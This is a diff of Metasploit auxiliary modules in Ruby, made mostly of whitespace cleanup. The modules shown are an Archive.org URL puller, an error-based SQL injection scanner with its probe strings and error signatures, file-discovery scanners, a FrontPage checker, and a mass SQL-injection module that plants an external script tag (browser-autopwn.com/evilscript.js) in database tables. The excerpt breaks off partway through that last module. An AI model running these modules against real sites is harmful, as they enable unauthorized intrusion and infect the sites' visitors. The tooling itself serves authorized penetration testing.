|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
|
||||
File.open(file_name, 'a') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Archive.org")
|
||||
urls = pull_urls(target)
|
||||
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join("\n") + "\n")
|
||||
else
|
||||
urls.each do |i|
|
||||
puts(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Error Based SQL Injection Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('METHOD', [ true, "HTTP Method",'GET']),
|
||||
@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('DATA', [ false, "HTTP Body Data", '']),
|
||||
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
gvars = nil
|
||||
pvars = nil
|
||||
cvars = nil
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sqlinj = [
|
||||
[ "'" ,'Single quote'],
|
||||
[ "')",'Single quote and parenthesis'],
|
||||
[ "\"",'Double quote'],
|
||||
[ "#{rand(10)}'", 'Random value with single quote']
|
||||
[ "#{rand(10)}'", 'Random value with single quote']
|
||||
]
|
||||
|
||||
|
||||
errorstr = [
|
||||
["Unclosed quotation mark after the character string",'MSSQL','string'],
|
||||
["Syntax error in string in query expression",'MSSQL','string'],
|
||||
["Microsoft OLE DB Provider",'MSSQL','unknown'],
|
||||
["You have an error in your SQL syntax",'MySQL','unknown'],
|
||||
["java.sql.SQLException",'unknown','unknown']
|
||||
["java.sql.SQLException",'unknown','unknown']
|
||||
]
|
||||
|
||||
|
||||
#
|
||||
# Dealing with empty query/data and making them hashes.
|
||||
#
|
||||
|
||||
|
||||
if !datastore['QUERY'] or datastore['QUERY'].empty?
|
||||
datastore['QUERY'] = nil
|
||||
gvars = nil
|
||||
else
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
end
|
||||
|
||||
|
||||
if !datastore['DATA'] or datastore['DATA'].empty?
|
||||
datastore['DATA'] = nil
|
||||
pvars = nil
|
||||
else
|
||||
pvars = queryparse(datastore['DATA'])
|
||||
end
|
||||
|
||||
|
||||
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
|
||||
datastore['COOKIE'] = nil
|
||||
cvars = nil
|
||||
@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
#
|
||||
# Send normal request to check if error is generated
|
||||
# Send normal request to check if error is generated
|
||||
# (means the error is caused by other means)
|
||||
#
|
||||
#
|
||||
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("Normal request sent.")
|
||||
print_status("Normal request sent.")
|
||||
end
|
||||
|
||||
|
||||
found = false
|
||||
inje = nil
|
||||
dbt = nil
|
||||
injt = nil
|
||||
|
||||
|
||||
if normalres
|
||||
errorstr.each do |estr,dbtype,injtype|
|
||||
if normalres.body.include? estr
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test")
|
||||
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
|
||||
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
|
||||
print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DATABASE_ERROR',
|
||||
:data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
return
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Test URI Query parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if gvars
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
gvars.each do |key,value|
|
||||
|
||||
gvars.each do |key,value|
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
gvars[key] = gvars[key]+istr
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing query with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing query with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
if testres
|
||||
errorstr.each do |estr,dbtype,injtype|
|
||||
if testres.body.include? estr
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
|
||||
print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
gvars = queryparse(datastore['QUERY'])
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Test DATA parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if pvars
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
pvars.each do |key,value|
|
||||
|
||||
pvars.each do |key,value|
|
||||
pvars = queryparse(datastore['DATA']) #Now its a Hash
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing data with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing data with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
pvars[key] = pvars[key]+istr
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => pvarstr
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Test COOKIE parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if datastore['COOKIE']
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
cvars.each do |key,value|
|
||||
|
||||
cvars.each do |key,value|
|
||||
cvars = queryparse(datastore['COOKIE']) #Now its a Hash
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
cvars[key] = cvars[key]+istr
|
||||
|
||||
|
||||
cvarstr = ""
|
||||
cvars.each do |tkey,tvalue|
|
||||
if cvarstr
|
||||
@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
cvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => cvarstr,
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,6 +1,9 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP File Same Name Directory Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of files
|
||||
in a given directory path named as the same name of the
|
||||
This module identifies the existence of files
|
||||
in a given directory path named as the same name of the
|
||||
directory.
|
||||
|
||||
Only works if PATH is differenet than '/'.
|
||||
Only works if PATH is differenet than '/'.
|
||||
},
|
||||
'Author' => [ 'et [at] metasploit.com' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The directory path to identify files", '/']),
|
||||
OptString.new('EXT', [ true, "File extension to use", '.aspx'])
|
||||
|
||||
], self.class)
|
||||
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
extensions = [
|
||||
'.null',
|
||||
extensions = [
|
||||
'.null',
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.c',
|
||||
@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.html',
|
||||
'.htm',
|
||||
'.log',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.tar',
|
||||
'.tar.gz',
|
||||
@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
end
|
||||
|
||||
testf = tpath.split('/').last
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
||||
extensions.each { |ext|
|
||||
begin
|
||||
testfext = testf.chomp + ext
|
||||
@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath}#{testfext} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Interesting File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of interesting files
|
||||
in a given directory path.
|
||||
This module identifies the existence of interesting files
|
||||
in a given directory path.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path to identify files", '/']),
|
||||
OptString.new('EXT', [ false, "Append file extension to use", '']),
|
||||
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
|
||||
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt")
|
||||
]
|
||||
)
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]),
|
||||
OptInt.new('TestThreads', [ true, "Number of test threads", 25])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
|
||||
nt = datastore['TestThreads'].to_i
|
||||
nt = 1 if nt == 0
|
||||
|
||||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
queue = []
|
||||
|
||||
|
||||
File.open(datastore['DICTIONARY']).each do |testf|
|
||||
queue << testf.strip
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
#
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
begin
|
||||
randfile = Rex::Text.rand_text_alpha(5).chomp
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath+randfile+ datastore['EXT'],
|
||||
'method' => 'GET',
|
||||
@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
while(not queue.empty?)
|
||||
t = []
|
||||
1.upto(nt) do
|
||||
1.upto(nt) do
|
||||
t << Thread.new(queue.shift) do |testf|
|
||||
Thread.current.kill if not testf
|
||||
|
||||
|
||||
testfext = testf.chomp + datastore['EXT']
|
||||
res = send_request_cgi({
|
||||
'uri' => tpath+testfext,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
else
|
||||
print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath}#{testfext} Code: #{res.code}"
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
|
||||
|
||||
|
||||
connect
|
||||
|
||||
sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" +
|
||||
@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def check_account(info, fpversion, target_host)
|
||||
|
||||
return if not fpversion
|
||||
return if not fpversion
|
||||
|
||||
connect
|
||||
|
||||
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
|
||||
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
|
||||
method = "method=open+service:#{fpversion}&service_name=/"
|
||||
|
||||
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
|
||||
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
|
||||
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
|
||||
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
|
||||
"User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" +
|
||||
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
|
||||
|
||||
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
|
||||
|
||||
sock.put(req)
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
|
||||
retcode = $1
|
||||
retmsg = $2.strip
|
||||
|
||||
|
||||
if(retcode == "100")
|
||||
res = sock.get_once
|
||||
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
|
||||
@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("#{info} FrontPage Unknown Response [#{retcode}]")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection',
|
||||
'Description' => %q{
|
||||
This module implements the mass SQL injection attack in
|
||||
This module implements the mass SQL injection attack in
|
||||
use lately by concatenation of HTML string that forces a persistant
|
||||
XSS attack to redirect user browser to a attacker controller website.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']),
|
||||
@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']),
|
||||
OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]),
|
||||
OptBool.new('COMMENTED', [ true, "Comment end of query", true]),
|
||||
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
|
||||
], self.class)
|
||||
|
||||
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def wmap_enabled
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
#Weird to indent for practical reasons.
|
||||
infstr = %Q{
|
||||
DECLARE @T varchar(255),@C varchar(255)
|
||||
@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255)
|
||||
|
||||
prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST("
|
||||
poststr = " AS NVARCHAR(4000));EXEC(@S);"
|
||||
|
||||
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
|
||||
|
||||
if gvars.has_key?(datastore['VULN_PAR'])
|
||||
|
||||
|
||||
prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil
|
||||
poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil
|
||||
|
||||
attstr = ""
|
||||
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
|
||||
attstr = ""
|
||||
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
|
||||
gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr
|
||||
else
|
||||
else
|
||||
print_status("Error: Vulnerable parameter is not part of the supplied query string.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['URI'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
